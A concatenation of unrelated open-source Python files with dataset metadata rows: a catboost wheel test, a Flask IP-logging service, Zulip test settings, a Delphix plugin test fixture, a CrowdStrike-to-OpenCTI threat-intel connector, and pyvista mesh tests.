] | null | null | null | catboost/python-package/ut/medium/test_whl.py | PallHaraldsson/catboost | f4b86aae0acb853f0216081518d490e52722ad88 | [
"Apache-2.0"
] | null | null | null | import yatest.common
import shutil
import os
import zipfile
PYTHON_PACKAGE_DIR = os.path.join("catboost", "python-package")
def test_wheel():
    """Build the catboost wheel and smoke-test importing it in a subprocess."""
    # Copy the wheel-building script next to us so it can be imported.
    shutil.copy(yatest.common.source_path(os.path.join(PYTHON_PACKAGE_DIR, "mk_wheel.py")), 'mk_wheel.py')
    from mk_wheel import PythonTrait, make_wheel

    # Resolve the CPU-only native extension that goes into the wheel.
    cpu_so_name = PythonTrait('', '', []).so_name()
    cpu_so_path = yatest.common.binary_path(os.path.join(PYTHON_PACKAGE_DIR, "catboost", "no_cuda", cpu_so_name))

    # Build the wheel, then unpack it so its modules are importable.
    wheel_name = 'catboost.whl'
    make_wheel(wheel_name, 'catboost', '0.0.0', yatest.common.source_path('.'), cpu_so_path, '')
    with zipfile.ZipFile(wheel_name, 'r') as f:
        f.extractall('catboost')

    # Run a small script with PYTHONPATH pointing at the unpacked wheel;
    # a non-zero exit from the subprocess fails the test.
    python_binary = yatest.common.binary_path(os.path.join(PYTHON_PACKAGE_DIR, "ut", "medium", "python_binary", "catboost-python"))
    test_script = yatest.common.source_path(os.path.join(PYTHON_PACKAGE_DIR, "ut", "medium", "run_catboost.py"))
    yatest.common.execute(
        [python_binary, test_script],
        env={'PYTHONPATH': os.path.join(os.getcwd(), 'catboost')},
        cwd=yatest.common.test_output_path()
    )
| 38.241379 | 131 | 0.706041 |
528405100008497b018b1d02621a1181b42c55a5 | 2,772 | py | Python | src/ip.py | thoolihan/LogIPsToAWSDynamoDB | 528734d4aca0fc27a5a702a95898b7de6fbb48bc | [
"Apache-2.0"
] | 1 | 2016-11-12T15:12:30.000Z | 2016-11-12T15:12:30.000Z | src/ip.py | thoolihan/LogIPsToAWSDynamoDB | 528734d4aca0fc27a5a702a95898b7de6fbb48bc | [
"Apache-2.0"
] | null | null | null | src/ip.py | thoolihan/LogIPsToAWSDynamoDB | 528734d4aca0fc27a5a702a95898b7de6fbb48bc | [
"Apache-2.0"
] | null | null | null | from flask import Flask
from flask import jsonify
from flask import request, Response
from functools import wraps
from datetime import datetime
import os
import boto3
import json
import argparse
from boto3.dynamodb.conditions import Key, Attr
app = Flask(__name__)
cred_file = open('credentials.json').read()
creds = json.loads(cred_file)
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--local', help="set to anything to use local dynamodb")
args = parser.parse_args()
tbl_name="ip_log"
def root_dir():  # pragma: no cover
    """Absolute path of the directory containing this module."""
    here = os.path.dirname(__file__)
    return os.path.abspath(here)
def get_file(filename):  # pragma: no cover
    """Read a file from the templates directory.

    On I/O failure the error text is returned instead of raising, so
    callers can serve it as a diagnostic page.
    """
    base = os.path.abspath(os.path.dirname(__file__))
    src = os.path.join(base, 'templates', filename)
    try:
        return open(src).read()
    except IOError as exc:
        return str(exc)
def check_auth(user, password):
    """True when the supplied basic-auth pair matches credentials.json."""
    expected = (creds['user'], creds['password'])
    return (user, password) == expected
def authenticate():
    """Sends a 401 response that enables basic auth"""
    # The WWW-Authenticate header is what makes browsers show the
    # basic-auth login prompt.
    return Response(
    'Could not verify your access level for that URL.\n'
    'You have to login with proper credentials', 401,
    {'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
    """Decorator: reject the request with a 401 unless valid basic-auth
    credentials accompany it."""
    @wraps(f)
    def decorated(*args, **kwargs):
        auth = request.authorization
        if not auth or not check_auth(auth.username, auth.password):
            return authenticate()
        return f(*args, **kwargs)
    return decorated
def get_ip_log():
    """Return the DynamoDB Table object for the IP log.

    Uses a local DynamoDB endpoint when the --local CLI flag was given,
    otherwise the default AWS endpoint/credentials.
    """
    if args.local:
        dyn = boto3.resource('dynamodb',
                             endpoint_url='http://localhost:8000')
    else:
        dyn = boto3.resource('dynamodb')
    return dyn.Table(tbl_name)
def log_to_aws(ip, location):
    """Store one (ip, location, timestamp) record in the DynamoDB table."""
    # NOTE(review): datetime.now() is naive local time; presumably UTC
    # would be preferable for a log — confirm before changing.
    dt = datetime.now()
    ip_log_table = get_ip_log()
    data = {"ip": ip,
            "location": location,
            "date": str(dt)}
    ip_log_table.put_item(Item = data)
@app.route('/log', methods=['GET'])
def metrics(): # pragma: no cover
    """Serve the static log-viewing page (no authentication required)."""
    content = get_file('log.html')
    return Response(content, mimetype="text/html")
@app.route("/", methods=['GET'])
@requires_auth
def ip():
    """Return the caller's IP address as JSON."""
    return jsonify({'ip': request.remote_addr}), 200
@app.route("/log_ip", methods=['GET','POST'])
@requires_auth
def log_ip():
    """Record the caller's IP under the supplied 'location' and echo it back."""
    ip = request.remote_addr
    # 'location' may come from the query string or a form body.
    location = request.values.get('location')
    log_to_aws(ip, location)
    return jsonify({'result': 'success',
                    'location': location,
                    'ip': ip}), 200
@app.route("/list", methods=['GET'])
@requires_auth
def home():
    """Return the most recent log entries for the given 'location'."""
    location = request.values.get('location')
    ipl = get_ip_log()
    # Newest first (ScanIndexForward=False), capped at 10 items.
    res = ipl.query(KeyConditionExpression=Key('location').eq(location),
                    ScanIndexForward=False, Limit=10)['Items']
    return jsonify(res), 200
if __name__ == "__main__":
app.run()
| 28.875 | 82 | 0.651876 |
5c25f9e962723718a17029599a22f23c42cea82d | 5,449 | py | Python | zproject/test_settings.py | acguglielmo/zulip | 97ed71ca699c3abd1c2584cc3c6a8370430ae2f6 | [
"Apache-2.0"
] | null | null | null | zproject/test_settings.py | acguglielmo/zulip | 97ed71ca699c3abd1c2584cc3c6a8370430ae2f6 | [
"Apache-2.0"
] | null | null | null | zproject/test_settings.py | acguglielmo/zulip | 97ed71ca699c3abd1c2584cc3c6a8370430ae2f6 | [
"Apache-2.0"
] | null | null | null | import os
# test_settings.py works differently from
# dev_settings.py/prod_settings.py; it actually is directly referenced
# by the test suite as DJANGO_SETTINGS_MODULE and imports settings.py
# directly and then hacks up the values that are different for the
# test suite. As will be explained, this is kinda messy and probably
# we'd be better off switching it to work more like dev_settings.py,
# but for now, this is what we have.
#
# An important downside of the test_settings.py approach is that if we
# want to change any settings that settings.py then computes
# additional settings from (e.g. EXTERNAL_HOST), we need to do a hack
# like the below line(s) before we import from settings, for
# transmitting the value of EXTERNAL_HOST to dev_settings.py so that
# it can be set there, at the right place in the settings.py flow.
# Ick.
if os.getenv("EXTERNAL_HOST") is None:
os.environ["EXTERNAL_HOST"] = "testserver"
from .settings import *
# Clear out the REALM_HOSTS set in dev_settings.py
REALM_HOSTS = {}
# Used to clone DBs in backend tests.
BACKEND_DATABASE_TEMPLATE = 'zulip_test_template'
DATABASES["default"] = {
"NAME": os.getenv("ZULIP_DB_NAME", "zulip_test"),
"USER": "zulip_test",
"PASSWORD": LOCAL_DATABASE_PASSWORD,
"HOST": "localhost",
"SCHEMA": "zulip",
"ENGINE": "django.db.backends.postgresql_psycopg2",
"TEST_NAME": "django_zulip_tests",
"OPTIONS": {"connection_factory": TimeTrackingConnection},
}
if "TORNADO_SERVER" in os.environ:
# This covers the Casper test suite case
TORNADO_SERVER = os.environ["TORNADO_SERVER"]
else:
# This covers the backend test suite case
TORNADO_SERVER = None
CAMO_URI = 'https://external-content.zulipcdn.net/'
CAMO_KEY = 'dummy'
if "CASPER_TESTS" in os.environ:
CASPER_TESTS = True
# Disable search pills prototype for production use
SEARCH_PILLS_ENABLED = False
# Decrease the get_updates timeout to 1 second.
# This allows CasperJS to proceed quickly to the next test step.
POLL_TIMEOUT = 1000
# Don't use the real message log for tests
EVENT_LOG_DIR = '/tmp/zulip-test-event-log'
# Stores the messages in `django.core.mail.outbox` rather than sending them.
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
# The test suite uses EmailAuthBackend
AUTHENTICATION_BACKENDS += ('zproject.backends.EmailAuthBackend',)
# Configure Google Oauth2
GOOGLE_OAUTH2_CLIENT_ID = "test_client_id"
# Makes testing LDAP backend require less mocking
AUTH_LDAP_ALWAYS_UPDATE_USER = False
TEST_SUITE = True
RATE_LIMITING = False
# Don't use rabbitmq from the test suite -- the user_profile_ids for
# any generated queue elements won't match those being used by the
# real app.
USING_RABBITMQ = False
# Disable the tutorial because it confuses the client tests.
TUTORIAL_ENABLED = False
# Disable use of memcached for caching
CACHES['database'] = {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
'LOCATION': 'zulip-database-test-cache',
'TIMEOUT': 3600,
'CONN_MAX_AGE': 600,
'OPTIONS': {
'MAX_ENTRIES': 100000
}
}
# Disable caching on sessions to make query counts consistent
SESSION_ENGINE = "django.contrib.sessions.backends.db"
# Use production config from Webpack in tests
if CASPER_TESTS:
WEBPACK_FILE = 'webpack-stats-production.json'
else:
WEBPACK_FILE = os.path.join('var', 'webpack-stats-test.json')
WEBPACK_LOADER['DEFAULT']['STATS_FILE'] = os.path.join(DEPLOY_ROOT, WEBPACK_FILE)
# Don't auto-restart Tornado server during automated tests
AUTORELOAD = False
if not CASPER_TESTS:
# Use local memory cache for backend tests.
CACHES['default'] = {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'
}
def set_loglevel(logger_name, level) -> None:
    """Force `level` for one logger in the LOGGING dict, creating its
    per-logger config entry on demand."""
    LOGGING['loggers'].setdefault(logger_name, {})['level'] = level
set_loglevel('zulip.requests', 'CRITICAL')
set_loglevel('zulip.management', 'CRITICAL')
set_loglevel('django.request', 'ERROR')
set_loglevel('fakeldap', 'ERROR')
set_loglevel('zulip.send_email', 'ERROR')
set_loglevel('zerver.lib.digest', 'ERROR')
set_loglevel('zerver.lib.email_mirror', 'ERROR')
set_loglevel('zerver.worker.queue_processors', 'WARNING')
# Enable file:/// hyperlink support by default in tests
ENABLE_FILE_LINKS = True
LOCAL_UPLOADS_DIR = 'var/test_uploads'
S3_KEY = 'test-key'
S3_SECRET_KEY = 'test-secret-key'
S3_AUTH_UPLOADS_BUCKET = 'test-authed-bucket'
S3_AVATAR_BUCKET = 'test-avatar-bucket'
# Test Custom TOS template rendering
TERMS_OF_SERVICE = 'corporate/terms.md'
INLINE_URL_EMBED_PREVIEW = False
HOME_NOT_LOGGED_IN = '/login'
LOGIN_URL = '/accounts/login'
# By default will not send emails when login occurs.
# Explicity set this to True within tests that must have this on.
SEND_LOGIN_EMAILS = False
GOOGLE_OAUTH2_CLIENT_ID = "id"
GOOGLE_OAUTH2_CLIENT_SECRET = "secret"
SOCIAL_AUTH_GITHUB_KEY = "key"
SOCIAL_AUTH_GITHUB_SECRET = "secret"
SOCIAL_AUTH_SUBDOMAIN = 'www'
# By default two factor authentication is disabled in tests.
# Explicitly set this to True within tests that must have this on.
TWO_FACTOR_AUTHENTICATION_ENABLED = False
PUSH_NOTIFICATION_BOUNCER_URL = None
# Disable messages from slow queries as they affect backend tests.
SLOW_QUERY_LOGS_STREAM = None
THUMBOR_URL = 'http://127.0.0.1:9995'
# Logging the emails while running the tests adds them
# to /emails page.
DEVELOPMENT_LOG_EMAILS = False
| 33.024242 | 81 | 0.750413 |
094c1dde0edea66ebc71734d2f9f45549868ce35 | 2,201 | py | Python | tools/src/test/python/dlpx/virtualization/_internal/fake_plugin/staged/multiple_warnings.py | vr-delphix/virtualization-sdk | ebf934c9eb1337b35f7eb34e807af63ea259da6a | [
"Apache-2.0"
] | null | null | null | tools/src/test/python/dlpx/virtualization/_internal/fake_plugin/staged/multiple_warnings.py | vr-delphix/virtualization-sdk | ebf934c9eb1337b35f7eb34e807af63ea259da6a | [
"Apache-2.0"
] | 95 | 2020-03-06T00:25:42.000Z | 2020-06-09T00:22:25.000Z | tools/src/test/python/dlpx/virtualization/_internal/fake_plugin/staged/multiple_warnings.py | vr-delphix/virtualization-sdk | ebf934c9eb1337b35f7eb34e807af63ea259da6a | [
"Apache-2.0"
] | 3 | 2019-10-14T18:33:30.000Z | 2019-10-23T17:08:08.000Z | #
# Copyright (c) 2019 by Delphix. All rights reserved.
#
# flake8: noqa
from __future__ import print_function
import logging
from dlpx.virtualization.platform import Plugin
logger = logging.getLogger()
logger.setLevel(logging.NOTSET)
staged = Plugin()
# Renamed source_connection to connection to test if named arg check detects.
@staged.discovery.repository()
def repository_discovery(connection):
return []
@staged.discovery.source_config()
def source_config_discovery(source_connection, repository):
return []
@staged.linked.mount_specification()
def staged_mount_specification(staged_source, repository):
return None
@staged.linked.pre_snapshot()
def staged_pre_snapshot(repository, source_config, staged_source,
snapshot_parameters):
pass
@staged.linked.post_snapshot()
def staged_post_snapshot(repository, source_config, staged_source,
snapshot_parameters):
return None
@staged.linked.start_staging()
def start_staging(repository, source_config, staged_source):
pass
@staged.linked.stop_staging()
def stop_staging(repository, source_config, staged_source):
pass
@staged.linked.status()
def staged_status(staged_source, repository, source_config):
return None
@staged.linked.worker()
def staged_worker(repository, source_config, staged_source):
pass
@staged.virtual.configure()
def configure(virtual_source, repository, snapshot):
return None
@staged.virtual.reconfigure()
def reconfigure(virtual_source, repository, source_config, snapshot):
return None
# Removed virtual.mount_specification for test validation.
@staged.virtual.pre_snapshot()
def pre_snapshot(repository, source_config, virtual_source):
pass
@staged.virtual.post_snapshot()
def post_snapshot(repository, source_config, virtual_source):
return None
@staged.virtual.start()
def start(repository, source_config, virtual_source):
pass
# Added snapshot parameter to check if arg check fails.
@staged.virtual.stop()
def stop(repository, source_config, virtual_source, snapshot):
pass
@staged.upgrade.repository('2019.10.30')
def repo_upgrade(old_repository):
return old_repository
| 21.578431 | 77 | 0.769196 |
c240f22df109a27a78549581e86086e54cb7a57b | 12,003 | py | Python | crowdstrike/src/crowdstrike/core.py | RomainGUIGNARD/connectors | 526c5c21267ec4c5c97436d76a7a23156c0f5281 | [
"Apache-2.0"
] | 1 | 2020-10-08T18:39:06.000Z | 2020-10-08T18:39:06.000Z | crowdstrike/src/crowdstrike/core.py | RomainGUIGNARD/connectors | 526c5c21267ec4c5c97436d76a7a23156c0f5281 | [
"Apache-2.0"
] | null | null | null | crowdstrike/src/crowdstrike/core.py | RomainGUIGNARD/connectors | 526c5c21267ec4c5c97436d76a7a23156c0f5281 | [
"Apache-2.0"
] | 1 | 2020-05-03T12:41:47.000Z | 2020-05-03T12:41:47.000Z | # -*- coding: utf-8 -*-
"""OpenCTI CrowdStrike connector core module."""
import os
import time
from typing import Any, Dict, List, Mapping, Optional
import yaml
from crowdstrike_client.client import CrowdStrikeClient
from pycti import OpenCTIConnectorHelper
from pycti.connector.opencti_connector_helper import get_config_variable
from stix2 import Identity, MarkingDefinition, TLP_AMBER, TLP_GREEN, TLP_RED, TLP_WHITE
from crowdstrike.actors import ActorImporter
from crowdstrike.indicators import IndicatorImporter
from crowdstrike.reports import ReportImporter
from crowdstrike.rules_yara_master import RulesYaraMasterImporter
from crowdstrike.utils import convert_comma_separated_str_to_list, create_organization
class CrowdStrike:
    """CrowdStrike connector.

    Polls the CrowdStrike Intel API on a fixed interval and imports the
    enabled scopes (actors, reports, indicators, YARA rules master) into
    OpenCTI. Per-importer cursors and the timestamp of the last run are
    persisted in the connector state between runs.
    """

    _CONFIG_NAMESPACE = "crowdstrike"

    # Configuration keys (dotted paths into config.yml / env var names).
    _CONFIG_BASE_URL = f"{_CONFIG_NAMESPACE}.base_url"
    _CONFIG_CLIENT_ID = f"{_CONFIG_NAMESPACE}.client_id"
    _CONFIG_CLIENT_SECRET = f"{_CONFIG_NAMESPACE}.client_secret"
    _CONFIG_INTERVAL_SEC = f"{_CONFIG_NAMESPACE}.interval_sec"
    _CONFIG_SCOPES = f"{_CONFIG_NAMESPACE}.scopes"
    _CONFIG_TLP = f"{_CONFIG_NAMESPACE}.tlp"
    _CONFIG_ACTOR_START_TIMESTAMP = f"{_CONFIG_NAMESPACE}.actor_start_timestamp"
    _CONFIG_REPORT_START_TIMESTAMP = f"{_CONFIG_NAMESPACE}.report_start_timestamp"
    _CONFIG_REPORT_INCLUDE_TYPES = f"{_CONFIG_NAMESPACE}.report_include_types"
    _CONFIG_REPORT_STATUS = f"{_CONFIG_NAMESPACE}.report_status"
    _CONFIG_REPORT_TYPE = f"{_CONFIG_NAMESPACE}.report_type"
    _CONFIG_REPORT_GUESS_MALWARE = f"{_CONFIG_NAMESPACE}.report_guess_malware"
    _CONFIG_INDICATOR_START_TIMESTAMP = f"{_CONFIG_NAMESPACE}.indicator_start_timestamp"
    _CONFIG_INDICATOR_EXCLUDE_TYPES = f"{_CONFIG_NAMESPACE}.indicator_exclude_types"
    _CONFIG_UPDATE_EXISTING_DATA = "connector.update_existing_data"

    # Importer scope names accepted in the "scopes" configuration value.
    _CONFIG_SCOPE_ACTOR = "actor"
    _CONFIG_SCOPE_REPORT = "report"
    _CONFIG_SCOPE_INDICATOR = "indicator"
    _CONFIG_SCOPE_YARA_MASTER = "yara_master"

    # Config string -> STIX2 TLP marking definition.
    _CONFIG_TLP_MAPPING = {
        "white": TLP_WHITE,
        "green": TLP_GREEN,
        "amber": TLP_AMBER,
        "red": TLP_RED,
    }

    # Config string -> CrowdStrike report status code.
    _CONFIG_REPORT_STATUS_MAPPING = {
        "new": 0,
        "in progress": 1,
        "analyzed": 2,
        "closed": 3,
    }

    _DEFAULT_REPORT_TYPE = "Threat Report"

    # State key holding the unix timestamp of the last completed run.
    _STATE_LAST_RUN = "last_run"

    def __init__(self) -> None:
        """Initialize CrowdStrike connector from config file / environment."""
        config = self._read_configuration()
        self.helper = OpenCTIConnectorHelper(config)

        # CrowdStrike connector configuration
        base_url = self._get_configuration(config, self._CONFIG_BASE_URL)
        client_id = self._get_configuration(config, self._CONFIG_CLIENT_ID)
        client_secret = self._get_configuration(config, self._CONFIG_CLIENT_SECRET)

        self.interval_sec = self._get_configuration(
            config, self._CONFIG_INTERVAL_SEC, is_number=True
        )

        # Scopes: comma separated list; empty set disables every importer.
        scopes_str = self._get_configuration(config, self._CONFIG_SCOPES)
        scopes = set()
        if scopes_str is not None:
            scopes = set(convert_comma_separated_str_to_list(scopes_str))
        self.scopes = scopes

        tlp = self._get_configuration(config, self._CONFIG_TLP)
        tlp_marking = self._convert_tlp_to_marking_definition(tlp)

        actor_start_timestamp = self._get_configuration(
            config, self._CONFIG_ACTOR_START_TIMESTAMP, is_number=True
        )

        report_start_timestamp = self._get_configuration(
            config, self._CONFIG_REPORT_START_TIMESTAMP, is_number=True
        )
        report_status_str = self._get_configuration(config, self._CONFIG_REPORT_STATUS)
        report_status = self._convert_report_status_str_to_report_status_int(
            report_status_str
        )
        report_type = self._get_configuration(config, self._CONFIG_REPORT_TYPE)
        if not report_type:
            report_type = self._DEFAULT_REPORT_TYPE
        report_include_types_str = self._get_configuration(
            config, self._CONFIG_REPORT_INCLUDE_TYPES
        )
        report_include_types = []
        if report_include_types_str is not None:
            report_include_types = convert_comma_separated_str_to_list(
                report_include_types_str
            )
        report_guess_malware = bool(
            self._get_configuration(config, self._CONFIG_REPORT_GUESS_MALWARE)
        )

        indicator_start_timestamp = self._get_configuration(
            config, self._CONFIG_INDICATOR_START_TIMESTAMP, is_number=True
        )
        indicator_exclude_types_str = self._get_configuration(
            config, self._CONFIG_INDICATOR_EXCLUDE_TYPES
        )
        indicator_exclude_types = []
        if indicator_exclude_types_str is not None:
            indicator_exclude_types = convert_comma_separated_str_to_list(
                indicator_exclude_types_str
            )

        update_existing_data = bool(
            self._get_configuration(config, self._CONFIG_UPDATE_EXISTING_DATA)
        )

        author = self._create_author()

        # Create CrowdStrike client and importers
        client = CrowdStrikeClient(base_url, client_id, client_secret)

        self.actor_importer = ActorImporter(
            self.helper,
            client.intel_api.actors,
            update_existing_data,
            author,
            actor_start_timestamp,
            tlp_marking,
        )

        self.report_importer = ReportImporter(
            self.helper,
            client.intel_api.reports,
            update_existing_data,
            author,
            report_start_timestamp,
            tlp_marking,
            report_include_types,
            report_status,
            report_type,
            report_guess_malware,
        )

        self.indicator_importer = IndicatorImporter(
            self.helper,
            client.intel_api.indicators,
            client.intel_api.reports,
            update_existing_data,
            author,
            indicator_start_timestamp,
            tlp_marking,
            indicator_exclude_types,
            report_status,
            report_type,
        )

        self.rules_yara_master_importer = RulesYaraMasterImporter(
            self.helper,
            client.intel_api.rules,
            client.intel_api.reports,
            author,
            tlp_marking,
            update_existing_data,
            report_status,
            report_type,
        )

    @staticmethod
    def _read_configuration() -> Dict[str, str]:
        """Load ``config.yml`` next to the package root; return {} if absent."""
        config_file_path = os.path.dirname(os.path.abspath(__file__)) + "/../config.yml"
        if not os.path.isfile(config_file_path):
            return {}
        # Use a context manager so the file handle is always closed; the
        # previous implementation leaked the handle returned by open().
        with open(config_file_path) as config_file:
            return yaml.load(config_file, Loader=yaml.FullLoader)

    @staticmethod
    def _create_author() -> Identity:
        """Return the STIX identity used as the author of imported objects."""
        return create_organization("CrowdStrike")

    @staticmethod
    def _get_yaml_path(config_name: str) -> List[str]:
        """Split a dotted config name (``a.b``) into its YAML path parts."""
        return config_name.split(".")

    @staticmethod
    def _get_environment_variable_name(yaml_path: List[str]) -> str:
        """Derive the env var name (``A_B``) from a YAML path (``[a, b]``)."""
        return "_".join(yaml_path).upper()

    @classmethod
    def _get_configuration(
        cls, config: Dict[str, Any], config_name: str, is_number: bool = False
    ) -> Any:
        """Resolve a config value from the environment or the YAML config."""
        yaml_path = cls._get_yaml_path(config_name)
        env_var_name = cls._get_environment_variable_name(yaml_path)
        config_value = get_config_variable(
            env_var_name, yaml_path, config, isNumber=is_number
        )
        return config_value

    @classmethod
    def _convert_tlp_to_marking_definition(cls, tlp_value: str) -> MarkingDefinition:
        """Map a TLP string ("white"/"green"/"amber"/"red") to its marking."""
        return cls._CONFIG_TLP_MAPPING[tlp_value.lower()]

    @classmethod
    def _convert_report_status_str_to_report_status_int(cls, report_status: str) -> int:
        """Map a report status string to the CrowdStrike status code."""
        return cls._CONFIG_REPORT_STATUS_MAPPING[report_status.lower()]

    def get_interval(self) -> int:
        """Return the polling interval in whole seconds."""
        return int(self.interval_sec)

    def _load_state(self) -> Dict[str, Any]:
        """Return the persisted connector state, or {} on first run."""
        current_state = self.helper.get_state()
        if not current_state:
            return {}
        return current_state

    @staticmethod
    def _get_state_value(
        state: Optional[Mapping[str, Any]], key: str, default: Optional[Any] = None
    ) -> Any:
        """Safely read ``key`` from a possibly-None state mapping."""
        if state is not None:
            return state.get(key, default)
        return default

    def _is_scheduled(self, last_run: Optional[int], current_time: int) -> bool:
        """Return True if enough time has elapsed since ``last_run``."""
        if last_run is None:
            # Never ran before: run immediately.
            return True
        time_diff = current_time - last_run
        return time_diff >= self.get_interval()

    @staticmethod
    def _current_unix_timestamp() -> int:
        """Return the current time as a unix timestamp (seconds)."""
        return int(time.time())

    def run(self):
        """Run the connector loop forever, polling every ``interval_sec``."""
        self.helper.log_info("Starting CrowdStrike connector...")
        while True:
            try:
                timestamp = self._current_unix_timestamp()
                current_state = self._load_state()

                self.helper.log_info(f"Loaded state: {current_state}")

                last_run = self._get_state_value(current_state, self._STATE_LAST_RUN)
                if self._is_scheduled(last_run, timestamp):
                    # Run every enabled importer, then merge their returned
                    # cursor state into a single new state blob.
                    actor_importer_state = self._run_actor_importer(current_state)
                    report_importer_state = self._run_report_importer(current_state)
                    indicator_importer_state = self._run_indicator_importer(
                        current_state
                    )
                    yara_master_importer_state = self._run_rules_yara_master_importer(
                        current_state
                    )

                    new_state = current_state.copy()
                    new_state.update(actor_importer_state)
                    new_state.update(report_importer_state)
                    new_state.update(indicator_importer_state)
                    new_state.update(yara_master_importer_state)
                    new_state[self._STATE_LAST_RUN] = self._current_unix_timestamp()

                    self.helper.log_info(f"Storing new state: {new_state}")
                    self.helper.set_state(new_state)
                    self.helper.log_info(
                        f"State stored, next run in: {self.get_interval()} seconds"
                    )
                else:
                    new_interval = self.get_interval() - (timestamp - last_run)
                    self.helper.log_info(
                        f"Connector will not run, next run in: {new_interval} seconds"
                    )
                time.sleep(60)
            except (KeyboardInterrupt, SystemExit):
                self.helper.log_info("Connector stop")
                # Raise SystemExit directly instead of calling the
                # site-provided exit() helper, which is not guaranteed to
                # exist outside an interactive interpreter.
                raise SystemExit(0)
            except Exception as e:
                self.helper.log_error(str(e))
                time.sleep(60)

    def _run_actor_importer(
        self, current_state: Mapping[str, Any]
    ) -> Mapping[str, Any]:
        """Run the actor importer if its scope is enabled; return its state."""
        if self._is_scope_enabled(self._CONFIG_SCOPE_ACTOR):
            return self.actor_importer.run(current_state)
        return {}

    def _run_report_importer(
        self, current_state: Mapping[str, Any]
    ) -> Mapping[str, Any]:
        """Run the report importer if its scope is enabled; return its state."""
        if self._is_scope_enabled(self._CONFIG_SCOPE_REPORT):
            return self.report_importer.run(current_state)
        return {}

    def _run_indicator_importer(
        self, current_state: Mapping[str, Any]
    ) -> Mapping[str, Any]:
        """Run the indicator importer if its scope is enabled; return its state."""
        if self._is_scope_enabled(self._CONFIG_SCOPE_INDICATOR):
            return self.indicator_importer.run(current_state)
        return {}

    def _run_rules_yara_master_importer(
        self, current_state: Mapping[str, Any]
    ) -> Mapping[str, Any]:
        """Run the YARA master importer if its scope is enabled; return its state."""
        if self._is_scope_enabled(self._CONFIG_SCOPE_YARA_MASTER):
            return self.rules_yara_master_importer.run(current_state)
        return {}

    def _is_scope_enabled(self, scope: str) -> bool:
        """Return True if ``scope`` was listed in the configured scopes."""
        result = scope in self.scopes
        if not result:
            self.helper.log_info(f"Scope '{scope}' is not enabled")
        return result
| 35.617211 | 88 | 0.653087 |
e25d3dce75a0dec79df3cccade8b4c1fd5b69560 | 20,648 | py | Python | tests/test_grid.py | borsden/pyvista | dface2fbec53f9a3679bad9454d95358cb2695a4 | [
"MIT"
] | null | null | null | tests/test_grid.py | borsden/pyvista | dface2fbec53f9a3679bad9454d95358cb2695a4 | [
"MIT"
] | null | null | null | tests/test_grid.py | borsden/pyvista | dface2fbec53f9a3679bad9454d95358cb2695a4 | [
"MIT"
] | null | null | null | import pathlib
import os
import weakref
import numpy as np
import pytest
import vtk
import pyvista
from pyvista import examples
from pyvista.plotting import system_supports_plotting
# Directory of this test module; used to feed readers a non-mesh file path.
test_path = os.path.dirname(os.path.abspath(__file__))
# True when running against VTK >= 9 (cell layout API changed in VTK 9).
VTK9 = vtk.vtkVersion().GetVTKMajorVersion() >= 9
# must be manually set until pytest adds parametrize with fixture feature
HEXBEAM_CELLS_BOOL = np.ones(40, np.bool_) # matches hexbeam.n_cells == 40
STRUCTGRID_CELLS_BOOL = np.ones(729, np.bool_) # struct_grid.n_cells == 729
# -- hexbeam fixture should report a positive volume.
def test_volume(hexbeam):
    assert hexbeam.volume > 0.0
# -- smoke-test plotting a structured grid (needs an on/off-screen renderer).
@pytest.mark.skipif(not system_supports_plotting(), reason="Requires system to support plotting")
def test_struct_example():
    # create and plot structured grid
    grid = examples.load_structured()
    cpos = grid.plot(off_screen=True) # basic plot
    assert isinstance(cpos, pyvista.CameraPosition)
    # Plot mean curvature
    cpos_curv = grid.plot_curvature(off_screen=True)
    assert isinstance(cpos_curv, pyvista.CameraPosition)
# -- converting a StructuredGrid yields one hexahedron (celltype 12) per cell.
def test_init_from_structured(struct_grid):
    unstruct_grid = pyvista.UnstructuredGrid(struct_grid)
    assert unstruct_grid.points.shape[0] == struct_grid.x.size
    assert np.all(unstruct_grid.celltypes == 12)
# -- deep copy must not alias the source grid's points.
def test_init_from_unstructured(hexbeam):
    grid = pyvista.UnstructuredGrid(hexbeam, deep=True)
    grid.points += 1
    assert not np.any(grid.points == hexbeam.points)
# -- invalid constructor arguments raise TypeError.
def test_init_bad_input():
    with pytest.raises(TypeError):
        unstruct_grid = pyvista.UnstructuredGrid(np.array(1))
    with pytest.raises(TypeError):
        unstruct_grid = pyvista.UnstructuredGrid(np.array(1),
                                                 np.array(1),
                                                 np.array(1),
                                                 'woa')
# -- build a two-hexahedron grid from raw cells/celltypes/points arrays;
#    VTK 9 drops the separate offset array, hence the branching.
def test_init_from_arrays():
    cells = np.array([8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 8, 9, 10, 11, 12, 13, 14, 15])
    cell_type = np.array([vtk.VTK_HEXAHEDRON, vtk.VTK_HEXAHEDRON], np.int32)
    cell1 = np.array([[0, 0, 0],
                      [1, 0, 0],
                      [1, 1, 0],
                      [0, 1, 0],
                      [0, 0, 1],
                      [1, 0, 1],
                      [1, 1, 1],
                      [0, 1, 1]])
    cell2 = np.array([[0, 0, 2],
                      [1, 0, 2],
                      [1, 1, 2],
                      [0, 1, 2],
                      [0, 0, 3],
                      [1, 0, 3],
                      [1, 1, 3],
                      [0, 1, 3]])
    points = np.vstack((cell1, cell2)).astype(np.int32)
    if VTK9:
        grid = pyvista.UnstructuredGrid(cells, cell_type, points, deep=False)
        assert np.allclose(grid.cells, cells)
    else:
        offset = np.array([0, 9], np.int8)
        grid = pyvista.UnstructuredGrid(offset, cells, cell_type, points, deep=False)
        assert np.allclose(grid.offset, offset)
    assert grid.n_cells == 2
    assert np.allclose(cells, grid.cells)
    if VTK9:
        assert np.allclose(grid.cell_connectivity, np.arange(16))
    else:
        with pytest.raises(AttributeError):
            grid.cell_connectivity
# -- the grid must be garbage-collected once the last reference is dropped.
def test_destructor():
    ugrid = examples.load_hexbeam()
    ref = weakref.ref(ugrid)
    del ugrid
    assert ref() is None
# -- surface extraction preserves original point ids.
def test_surface_indices(hexbeam):
    surf = hexbeam.extract_surface()
    surf_ind = surf.point_arrays['vtkOriginalPointIds']
    assert np.allclose(surf_ind, hexbeam.surface_indices())
# -- 90 deg feature angle finds edges on the beam; 180 deg finds none.
def test_extract_feature_edges(hexbeam):
    edges = hexbeam.extract_feature_edges(90)
    assert edges.n_points
    edges = hexbeam.extract_feature_edges(180)
    assert not edges.n_points
# -- in-place triangulation turns every cell into a tetrahedron.
